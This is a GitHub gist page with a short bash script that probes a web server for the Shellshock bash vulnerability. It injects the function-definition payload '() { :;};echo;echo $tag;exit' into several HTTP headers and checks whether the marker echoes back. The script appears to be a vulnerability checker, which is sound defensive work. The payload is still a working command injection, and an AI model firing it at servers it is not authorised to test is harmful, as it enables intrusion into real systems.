Skip to content

Instantly share code, notes, and snippets.

@sdoro
Forked from panzi/shellshocker.sh
Last active August 29, 2015 14:07
Show Gist options
  • Save sdoro/bab7c386b8cef35b559c to your computer and use it in GitHub Desktop.
Save sdoro/bab7c386b8cef35b559c to your computer and use it in GitHub Desktop.
#!/bin/bash
url="$1"
tag=`uuid`
payload="() { :;};echo;echo $tag;exit"
vulnerable=0
function shellshock () {
header="$1"
response=`curl --header "$header: $payload" --silent --insecure "$url"`
if [ $PIPESTATUS -ne 0 ]; then
echo "error connecting to $url" >&2
exit 1
elif [[ "$response" == *$tag* ]]; then
echo "vulnerable header: $header"
vulnerable=1
fi
}
for header in Host Cookie User-Agent Referer; do
shellshock "$header"
done
if [ $vulnerable -eq 0 ]; then
echo "server seems to be unaffected"
else
exit 1
fi
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment